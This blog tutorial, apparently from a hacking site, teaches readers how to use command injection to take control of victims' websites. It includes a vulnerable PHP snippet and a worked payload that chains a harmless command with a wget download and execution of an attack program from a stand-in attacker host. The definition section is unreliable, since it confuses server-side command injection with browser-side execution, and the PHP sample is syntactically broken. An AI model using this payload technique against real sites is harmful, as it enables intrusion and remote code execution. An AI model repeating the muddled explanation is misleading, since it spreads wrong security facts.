I have previously explained how to use SQL injection and XPath Injection to hack websites. Today I will teach you another type of injection technique that, if executed properly, can give you complete ownership of victim’s website, called Command Injection. When user input is used as a part of system command, a hacker may inject system commands into the user input.
Let’s break this down:
What is Command Injection?
Command injection is an attack method in which we alter the dynamically generated content on a webpage by entering shell commands into an input mechanism, such as a form field that lacks effective validation constraints. We can exploit that vulnerability to gain unauthorized access to data or network resources. When users visit an affected webpage, their browsers interpret the code, which may cause malicious commands to execute in the users’ computers and across their networks. The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable website. In situations like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).
Command Injection Tutorial for Hackers |
This can happen in any programming language but its very common in PERL, PHP, and shell based CGI. It is less common in Java, Python, and C .
Let’s use some examples
Consider the below PHP code:
<?PHP
$email_subject =”Welcome to HackingLoops”;if ( isset ($_GET {’email’} ) ) {
system( “mail ” $_GET {’email’}) “-s ‘ ” $email_subject
” ‘ < /tmp/email_body”, $return_val);
}
?>
The above code is an example of where the user sends his or her email address in the email parameter, and that user input is directly placed in the system command. Now, similar to SQL injection or XPath injection, our goal is to inject the shell command into the email parameter, while making sure the code before and after the email parameter remains syntactically correct, otherwise the injection will not execute.
Consider the system ( ) call as small jigsaw puzzle game where we arrange different puzzle pieces to make a single image. All the parts except one part are in place, now we have to find the middle piece to finish the puzzle. This is a simple task with puzzle pieces, but it’s a little tricky in command injection. So our objective is shown below:
mail [missing puzzle part] -s ‘Welcome to HackingLoops’ </tmp/email_body
Note: For the missing puzzle piece, we need to ensure that the mail command runs properly and exits properly. Basically, I want to focus on syntax, to sure it is syntactically correct.
For example, mail “–help” will run and exit properly. Now we can add other additional shell command by separating the commands with a semi colon (;).
We can also find the missing puzzle part using the shell commenting symbol (#) in front. So we can manipulate the missing puzzle piece as below:
–help; wget http://somehackersite.com/attack_program; ./attack_program #
Now, adding the missing puzzle piece to our original existing shell command, the below shell command is created:
mail –help; wget http://somehackersite.com/attack_program; ./attack_program # s ‘Welcome to HackingLoops’ < /tmp/email_body
This resulting command is equivalent to below command:
mail –help; wget http://somehackersite.com/attack_program; ./attack_program
The above shell command will run the mail –help and then download the attack program from somehackersite.com and execute it on the victim, allowing the hacker to perform arbitrary commands on the vulnerable website. In most cases, provides complete access to the root directory.
Copy Cats, one last warning from HackingLoops: stop copying our articles. If you copy articles, always mention the source. Otherwise get ready for a DMCA penalty and a negative rating on Google.
Leave a Reply